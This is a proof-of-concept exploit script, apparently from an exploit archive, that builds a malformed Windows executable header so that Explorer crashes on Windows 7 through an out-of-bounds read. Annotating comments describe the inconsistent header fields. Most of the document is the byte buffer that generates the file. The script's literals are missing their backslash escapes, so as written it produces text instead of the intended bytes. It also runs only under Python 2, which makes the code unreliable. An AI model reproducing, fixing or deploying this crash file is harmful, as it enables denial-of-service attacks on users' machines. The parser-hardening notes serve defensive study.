# Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC)
# Date: 2018-09-01
# Exploit Author: Ghaaf
# Vendor Homepage: http://www.microsoft.com
# Version: Windows 7(x86/x64)
# Tested on: 6.1.7601 Service Pack 1 Build 7601
# CVE: N/A

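# Builds a small file image in `buffer` and writes it to poc.exe in the
# current working directory.
#
# NOTE(review): the literals below are shown without backslash escapes, so as
# written they are plain ASCII text ("x4D", "x5A", ...), not raw bytes. The
# layout notes here describe the hex values that text spells out: 35 rows of
# 16 values, i.e. 560 bytes.
#
# Layout of the spelled-out values:
#   - row 1 starts with 4D 5A ("MZ"); the last dword of row 4 (offset 0x3C)
#     is 0xB8, the offset of the PE header
#   - rows 5-8 spell the DOS stub text "This program cannot be run in DOS mode."
#   - offset 0xB8 holds 50 45 00 00 ("PE\0\0"), Machine 0x014C, 3 sections
#   - section names .text, .data and .rsrc appear from offset 0x1B0
#
# Defender notes (header fields are inconsistent with the file size):
#   - SizeOfOptionalHeader reads 0x2020, although the section names sit where
#     a 0xE0-byte optional header would put them
#   - every section header declares raw data at offsets 0x1000-0x3000, beyond
#     the 560 bytes present; no section data follows the headers
#   Presumably one of these header-derived offsets is what the out-of-bounds
#   read named in the title follows; the page does not say which - confirm
#   before relying on it. A parser is expected to check such offsets and sizes
#   against the actual file length before dereferencing them.
#
# Python 2 script: a str is written to a binary-mode handle, which Python 3
# rejects with TypeError.
buffer = ''
buffer += "x4Dx5Ax90x00x03x00x00x00x04x00x00x00xFFxFFx00x00"
buffer += "xB8x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00xB8x00x00x00"
buffer += "x0Ex1FxBAx0Ex00xB4x09xCDx21xB8x01x4CxCDx21x54x68"
buffer += "x69x73x20x70x72x6Fx67x72x61x6Dx20x63x61x6Ex6Ex6F"
buffer += "x74x20x62x65x20x72x75x6Ex20x69x6Ex20x44x4Fx53x20"
buffer += "x6Dx6Fx64x65x2Ex0Dx0Dx0Ax24x00x00x00x00x00x00x00"
buffer += "x8Fx8AxF9xDBxCBxEBx97x88xCBxEBx97x88xCBxEBx97x88"
buffer += "x48xF7x99x88xCAxEBx97x88xA2xF4x9Ex88xCAxEBx97x88"
buffer += "x22xF4x9Ax88xCAxEBx97x88x52x69x63x68xCBxEBx97x88"
buffer += "x00x00x00x00x00x00x00x00x50x45x00x00x4Cx01x03x00"
buffer += "xE8x2Dx73x54x00x00x00x00x00x00x00x00x20x20x0Fx01"
buffer += "x0Bx01x06x00x00x10x00x00x00x20x00x00x00x00x00x00"
buffer += "x68x11x00x00x00x10x00x00x00x20x00x00x00x00x40x00"
buffer += "x00x10x00x00x00x10x00x00x04x00x00x00x01x00x00x00"
buffer += "x04x00x00x00x00x00x00x00x00x40x00x00x00x10x00x00"
buffer += "xB2xEAx00x00x02x00x00x00x00x00x10x00x00x10x00x00"
buffer += "x00x00x10x00x00x10x00x00x00x00x00x00x10x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x94x1Ax00x00x28x00x00x00"
buffer += "x00x30x00x00xA4x08x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x28x02x00x00x20x00x00x00"
buffer += "x00x10x00x00x88x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
buffer += "x2Ex74x65x78x74x00x00x00x38x0Dx00x00x00x10x00x00"
buffer += "x00x10x00x00x00x10x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x20x00x00x60x2Ex64x61x74x61x00x00x00"
buffer += "xE0x09x00x00x00x20x00x00x00x10x00x00x00x20x00x00"
buffer += "x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00xC0"
buffer += "x2Ex72x73x72x63x00x00x00xA4x08x00x00x00x30x00x00"
buffer += "x00x10x00x00x00x30x00x00x00x00x00x00x00x00x00x00"
buffer += "x00x00x00x00x40x00x00x40x6CxDAx5Bx4Ax10x00x00x00"

# Context manager so the handle is flushed and closed deterministically
# instead of being left to garbage collection.
with open("poc.exe", "wb") as out_file:
    out_file.write(buffer)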